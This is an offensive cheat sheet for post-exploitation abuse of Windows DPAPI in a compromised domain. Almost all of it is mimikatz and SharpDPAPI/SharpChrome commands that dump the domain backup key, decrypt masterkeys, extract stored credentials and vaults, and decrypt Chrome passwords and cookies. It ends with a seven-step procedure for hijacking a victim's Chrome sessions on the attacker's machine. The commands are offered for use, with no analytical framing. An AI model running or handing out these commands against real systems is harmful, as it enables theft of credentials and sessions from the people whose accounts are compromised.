DPAPI

In a domain admin post-exploitation scenario, dump the domain backup key first and then decrypt all that you need by adding the option /pvk:key.pvk with SharpDPAPI

Retrieve domain backup key

lsadump::backupkeys /system:<DC> /export

Use current DC and display as B64, by default

SharpDPAPI.exe backupkey [/server:SERVER.domain] [/file:key.pvk]

DPAPI blob decryption

mimikatz dpapi::blob /in:c:\\..\\<blob_file> /masterkey:<masterkey>

Rerieve GUID

dir /a C:\Users\<username>\AppData\Roaming\Microsoft\Credentials
dir /a C:\Users\<username>\AppData\Local\Microsoft\Credentials

Extract masterkey

Retrieve SHA1 representation of the Masterkey
privilege::debug
!sekurlsa::dpapi
!dpapi::cache
Decrypt offline user’s masterkey

Keys location C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user-SID>\<KEY_GUIDs>

dpapi::masterkey /in:<MASTERKEY_LOCATON> /sid:<USER_SID> /password:<USER_PLAINTEXT> /protected

Extract user machine credentials and vaults

SharpDPAPI.exe machinetriage
Decrypt machine masterkey
dpapi::masterkey /in:C:\Windows\System32\Microsoft\Protect\S-1-5-18\<GUID> /system:DPAPI_SYSTEM
SharpDPAPI.exe machinemasterkeys
Decrypt machine vault
SharpDPAPI.exe machinevaults

Extract user credentials, vault and rdg

SharpDPAPI.exe triage
SharpDPAPI

Extract credentials

SharpDPAPI.exe credentials [{GUID1}:SHA1 {GUID2}:SHA1 ...]

Also can work remotely

SharpDPAPI credentials /pvk:<BASE64_backup_key> [server:<server.fqdn_domain>]

Extract vaults

SharpDPAPI.exe vaults [{GUID1}:SHA1 {GUID2}:SHA1 ...]

Also can work remotely

SharpDPAPI.exe vaults /pvk:<BASE64_backup_key> [server:<server.fqdn_domain>]
Mimikatz

Step 1 Masterkey dump - You do not know the user’s password

mimikatz dpapi::masterkey /in:"C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user_SID>\<cred_file>" /rpc

Step 1 Masterkey dump - You know the user’s password

mimikatz dpapi::masterkey /in:"C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user_SID>\<cred_file>" /sid:<user_sid> /password:<password> /protected

Step 2 - Data decryption

mimikatz dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\<ID> /masterkey:<masterkey>

Google Chrome

SharpChrome
SharpChrome.exe <logins | cookies> /pvk:<key.pvk | BASE64> /format:table [/showall] [/server:<target>]
Mimikatz

If the user’s context cannot be taken see other scenarios: https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/

mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\UserData\Default\Login Data"
mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\UserData\Default\Login Data" /unprotect
mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\UserData\Default\Cookies" /unprotect
Stealing Domain Users’ sessions

Step 1 - Download the whole Chrome folder

C:\Users\<victim>\AppData\Local\Google\Chrome\User Data\

Step 2 - Download all the cred files in this folder

C:\users\<victim>\appdata\Roaming\Microsoft\Protect\<victim_SID>

Step 3 - On your local machine in your mimikatz folder copy the masterkey

xcopy /H <victim_SID>\<cred_file> 

Step 4 - Decrypt the user’s keys from Mimikatz

dpapi::masterkey /in:<cred_file> /pvk:<domain_backup_key.pvk>

Step 5 - Put the victim’s key in memory on your local machine

dpapi::create /guid:{<szGuid>} /key:<private_key> /password:<local user's password> /protected
del /a <cred_file>

Step 6 - Copy the file on your local machine

xcopy /H <Mimikatz_folder>\<cred_file> C:\Users\<local_user>\AppData\Roaming\Microsoft\Protect\<local user's SID>\

Step 7 - Open Google Chrome and enjoy!